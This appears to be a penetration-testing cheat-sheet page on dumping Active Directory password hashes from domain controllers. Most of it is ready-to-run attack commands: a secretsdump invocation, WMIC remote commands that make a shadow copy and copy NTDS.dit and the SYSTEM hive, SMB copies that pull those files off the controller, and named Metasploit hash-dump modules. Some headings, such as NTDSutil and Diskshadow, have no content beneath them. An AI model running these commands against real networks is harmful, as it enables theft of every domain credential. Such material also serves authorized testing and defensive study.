Dump the domain (Domain Controllers)
Remote Access
Secretsdump.py
secretsdump -just-dc-ntlm -user-status -o [out_file] [Domain]/[User]@[IP] WMIC & NTDSutil
wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c vssadmin create shadow /for=C: 2>&1"
wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1"
wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM\ C:\temp\SYSTEM.hive 2>&1"
copy \\10.0.0.1\c$\temp\ntds.dit C:\temp
copy \\10.0.0.1\c$\temp\SYSTEM.hive C:\tempMetasploit
auxiliary/admin/smb/psexec_ntdsgrab
windows/gather/credentials/domain_hashdumpLocal Access
NTDSutil
Diskshadow
Extracting from NTDS.dit
Last updated
Was this helpful?